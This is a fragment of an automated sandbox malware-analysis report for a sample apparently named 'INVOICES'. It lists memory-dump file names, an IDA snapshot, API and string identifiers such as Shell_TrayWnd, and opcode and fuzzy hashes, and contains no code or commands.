                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                  • Opcode ID: ca0ec2cb91aea161bd2403d59ebcc0c7a91d5348d2c65000a4d0146daa121175
                                                                                                                                  • Instruction ID: de67d63a2e5be1a024c3b3e72f6ce5c9e2394434265aa5de32bb2634134344c0
                                                                                                                                  • Opcode Fuzzy Hash: ca0ec2cb91aea161bd2403d59ebcc0c7a91d5348d2c65000a4d0146daa121175
                                                                                                                                  • Instruction Fuzzy Hash: 10D0C971784711B6E6A4AB74AC0FFA66A14BB04F50F004925F659AA1D0C9E8A8108668